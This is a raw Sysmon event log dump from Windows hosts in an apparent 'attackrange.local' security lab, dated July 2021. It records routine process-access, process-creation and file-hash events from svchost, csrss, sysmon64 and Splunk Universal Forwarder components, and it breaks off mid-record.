07:54:50.005{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049762Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:50.005{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049761Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:50.005{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 23542300x8000000000000000808029Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:51.806{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1B615F6103087DB6062341B1B919EF83,SHA256=FA0D14E9F413B2F2AABE952F2B643D839C56BFFE515B2D999A949ECD8C46BE74,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049805Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:51.826{466BC892-F54B-60EB-4F7D-00000000CF01}9376420C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049804Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:51.626{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F54B-60EB-4F7D-00000000CF01}9376C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049803Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:51.626{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049802Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:51.626{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049801Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:51.626{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049800Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:51.626{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049799Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:51.626{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F54B-60EB-4F7D-00000000CF01}9376C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001049798Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:51.626{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F54B-60EB-4F7D-00000000CF01}9376C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001049797Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:51.590{466BC892-F54B-60EB-4F7D-00000000CF01}9376C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001049796Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:51.258{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E27C6F0096210527D98111FDF7E38069,SHA256=C0B623D8EEA82BF598899059FBE36BF34B7C560AE9AFF86BC077D8B5F58706E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049795Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:51.243{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B83D4A005D9B20FF2375DC865001B450,SHA256=31D6F38DC7FF644EE687F21D6C58CAA632F168D4E83F3E3A9B308915A25D04A2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049794Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:51.243{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=35DA5F5B2D9F273039BDFC03DEACB530,SHA256=590E3C91D8411BD84D01C86820176AB530A4C7FED00171CA3BB3D7F2E01D10AA,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000808030Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:52.837{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DB228DA9774801393C35586B607E9D97,SHA256=9FF97E1C5EBE832A7C71A1A2A3847A3C2E508D48838C4048527F8959353E366E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049823Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:52.973{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F54C-60EB-517D-00000000CF01}8784C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049822Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:52.957{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001049821Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:52.957{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049820Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:52.957{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049819Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:52.957{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049818Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:52.957{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F54C-60EB-517D-00000000CF01}8784C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001049817Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:52.957{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F54C-60EB-517D-00000000CF01}8784C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001049816Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:52.958{466BC892-F54C-60EB-517D-00000000CF01}8784C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001049815Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:52.603{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B83D4A005D9B20FF2375DC865001B450,SHA256=31D6F38DC7FF644EE687F21D6C58CAA632F168D4E83F3E3A9B308915A25D04A2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049814Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:52.304{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F54C-60EB-507D-00000000CF01}6156C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049813Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:52.304{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049812Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:52.304{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049811Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:52.304{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F54C-60EB-507D-00000000CF01}6156C:\Program 